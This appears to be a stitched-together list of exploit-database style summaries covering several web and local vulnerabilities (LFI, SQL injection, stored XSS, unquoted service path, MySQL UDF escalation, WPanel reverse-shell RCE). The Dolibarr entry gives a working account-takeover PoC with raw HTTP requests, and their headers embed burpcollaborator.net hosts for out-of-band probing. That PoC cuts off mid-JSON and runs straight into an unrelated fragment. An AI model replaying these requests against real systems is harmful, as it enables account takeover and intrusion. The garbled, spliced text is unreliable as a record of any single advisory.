The 'modname' parameter in 'Modules.php' is vulnerable to local file inclusion. This vulnerability can be exploited to expose sensitive information from arbitrary files in the underlying system.
The Remote Mouse service in version 4.002 of the Remote Mouse software for Windows has an unquoted service path vulnerability. This vulnerability could allow an attacker to escalate privileges by placing a malicious executable in a higher directory in the system's PATH environment variable.
This exploit allows an authenticated user to execute remote code on the WPanel 4.3.1 CMS. It works on Linux, Windows, and Mac platforms. The exploit uses a PHP reverse shell script to gain remote access to the target system. The exploit requires the user to provide the target URL, email, and password.
Using the chain of issues below, an attacker can compromise any Dolibarr user account, including the admin.

PoC:

1. Visit https://example.com/api/index.php/login?login=demo&password=demo and try to log in with a test user with 0 permissions or fewer permissions.
2. We will receive an API token in return.
3. Next we need to fetch the user id of the user whose account we want to own. First we need to fetch the user id of the admin user using the API below.

Request1:

    GET /api/index.php/users/login/admin HTTP/1.1
    Host: preview2.dolibarr.org
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@tqn9xk6rn6fq8x9ijbmpouosrjxan3srh.burpcollaborator.net
    Accept: application/json
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DOLAPIKEY: test1337
    Connection: close

This will return the user details using the username. Now update the victim user account via the API below (include the JSON body received from the previous Request1 and replace the email id in that JSON with the attacker-controlled email).

Request2:

    PUT /api/index.php/users/*12* HTTP/1.1
    Host: preview2.dolibarr.org
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@67bmexn44jw3paqv0o3257558wen5mwal.burpcollaborator.net
    Accept: application/json
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DOLAPIKEY: test1337
    Origin: https://preview2.dolibarr.org
    Connection: close
    Referer: http://5z5l6wf3wio2h9iusnv1x6x40v6mxkw8l.burpcollaborator.net/ref
    Content-Length: 3221

    {"id": "12","sta
First, add a client group. After uploading a file as a user with any role, the payload is written in the 'title' part of the redirected page; add the group you created and save. For users with the 'System Administrator' role, the XSS is triggered on the 'Dashboard' page.
This exploit targets a vulnerability in MySQL User-Defined (Linux) x32 / x86_64. It allows an attacker to escalate their privileges locally by executing malicious code through the 'sys_exec' function.
The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose RTSP credentials in plain-text.
The Police Crime Record Management System 1.0 is vulnerable to SQL injection in the 'casedetails' parameter. An attacker can exploit this vulnerability to manipulate the SQL query and potentially extract sensitive information from the database.
The Police Crime Record Management System 1.0 is vulnerable to 'Multiple' Stored Cross-Site Scripting (XSS) attacks. An attacker can exploit this vulnerability by injecting malicious code in the 'Firstname' or 'Othernames' field when adding staff. This allows the attacker to execute arbitrary JavaScript code in the context of the admin user's browser.
The WordPress Plugin Picture Gallery 1.4.2 is vulnerable to stored cross-site scripting (XSS) attacks. An attacker can exploit this vulnerability by injecting malicious JavaScript code into the 'Edit Content URL' input field in the admin panel. When the code is triggered, it executes in the context of the affected website, allowing the attacker to steal sensitive information or perform unauthorized actions on behalf of the user.